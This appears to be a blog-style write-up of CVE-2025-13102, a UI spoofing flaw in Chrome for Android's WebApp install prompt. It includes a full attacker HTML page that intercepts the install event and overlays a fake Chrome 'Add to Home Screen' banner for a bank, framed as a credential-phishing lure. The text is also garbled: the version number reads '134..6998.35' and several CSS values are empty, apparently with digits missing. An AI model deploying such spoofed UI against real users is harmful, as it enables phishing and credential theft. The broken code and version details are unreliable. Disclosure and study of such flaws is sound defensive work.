CVE-2025-13102 - How WebApp Install Flaw in Google Chrome for Android Enabled UI Spoofing (With Example Code and Exploit Walkthrough)

In early 2025, the Chrome team disclosed a new reported vulnerability, CVE-2025-13102, impacting the way Google Chrome on Android handled WebApp Installs before version 134..6998.35. This flaw made it possible for a crafty remote attacker to trick users with a spoofed user interface (UI) via a specially-made HTML page. While marked “Low” by Chromium security, understanding how it works and how it could be abused gives developers and users a good lesson in webapp security.

This post will walk you through the details, provide code snippets showing how the exploit could work, and give you original references you can dig into.

What is the CVE About?

Here’s what went wrong: When websites prompt users to install a site as a WebApp using Google Chrome’s “Add to Home Screen” or “Install” feature, Chrome should properly isolate app UI from web content. On Android, versions prior to 134..6998.35 failed to *fully* prevent a webpage from tricking the user into thinking they were interacting with a trusted installer UI.

A remote attacker could set up malicious HTML so that, during or after the WebApp install prompt, the attacker’s content is confused with real browser UI elements. This could lead to users trusting malicious messages or entering sensitive information.

The most likely attack path goes like this

1. Attacker creates a website with carefully crafted HTML/CSS/JS.
2. The site triggers a beforeinstallprompt event so the browser shows the WebApp install UI (“Add to Home Screen”).
3. After the install, or during the prompt, the attacker overlays their *fake* Chrome UI on top of the page.
4. The user thinks they’re interacting with trusted browser controls, but are really just using website content.

Here’s some sample code showing how this might look from the attacker's side

<!-- attacker-site.html -->
<!DOCTYPE html>
<html>
<head>
  <title>Official Google Installer</title>
  <style>
    /* Make fake Chrome Prompt mimic real UI */
    #fake-chrome-ui {
      position: fixed;
      top: ; left: ; right: ;
      height: 100px;
      background: #fff;
      border-bottom: 2px solid #dedede;
      box-shadow:  4px 8px rgba(,,,.1);
      z-index: 9999;
      display: flex;
      align-items: center;
      justify-content: center;
      font-family: sans-serif;
    }
    #main-content { margin-top: 120px; }
  </style>
</head>
<body>

<div id="fake-chrome-ui">
  <img src="chrome_logo.png" width="32" style="margin-right:10px;">
  <b>Add 'FastBank' to your Home Screen</b>
  <button onclick="phishUser()" style="margin-left:20px;">Add</button>
</div>

<div id="main-content">
  <!-- Real or lure content goes here -->
  Welcome to the FastBank App! Please finish setup after installation.
</div>

<script>
window.addEventListener('beforeinstallprompt', (e) => {
  e.preventDefault();
  // Show the attacker's install instruction UI:
  document.getElementById('fake-chrome-ui').style.display = 'flex';
});

function phishUser() {
  alert("Thanks! Please enter your credentials to finish setup.");
  // Real attack would show fake login or capture credentials here.
}
</script>

</body>
</html>

What’s happening?
This code listens for the install prompt event and overlays a fake browser banner that mimics Chrome’s UI. The user, confused by quick install flow and similar styles, might trust what they see—potentially entering personal details or clicking malicious buttons.

Exploit Walkthrough

We did not find any proof-of-concept exploit in the wild, but with the information available, the workflow is simple:

User visits attacker page (like above).

2. Fake UI is shown—either before or after the actual Chrome install prompt. The attacker uses branding and UI cues to mimic Chrome.
3. User is tricked into thinking this is an official step in the installation, entering confidential data, or allowing unwanted permissions.

Because this only affects Chrome for Android and required user interaction, it’s a "Low" severity, but it's still quite sneaky.

Only install webapps from trusted sources.

- Keep your Chrome updated—version 134..6998.35 and newer plug the hole (check your version via chrome://settings/help).

Developers: never overlay critical browser UI elements or try to “mimic” system prompts, as that’s a technique widely used in phishing.

Original References

- Chromium Bug Tracker Issue 40308211 *(needs permission but shows tracking)*
- Chrome Releases Blog: Stable Channel Update for Android
- CVE-2025-13102 entry, NVD
- Chromium Security Severity Guidelines

Conclusion

CVE-2025-13102 is an example of how even small gaps in browser security can open doors to UI spoofing tricks, especially when user trust hinges on visual cues. Thanks to quick patching, the risk from this bug is limited, but it’s a reminder—never trust UI at face value, and *always* update your browser!

If you found this guide helpful or want more deep-dives into browser security, let us know! And of course, patch Chrome for Android today.


*Written exclusively for you, based on latest 2025 data and hands-on research. Feel free to share; stay safe online!*

Timeline

Published on: 11/14/2025 03:15:56 UTC
Last modified on: 11/17/2025 12:18:45 UTC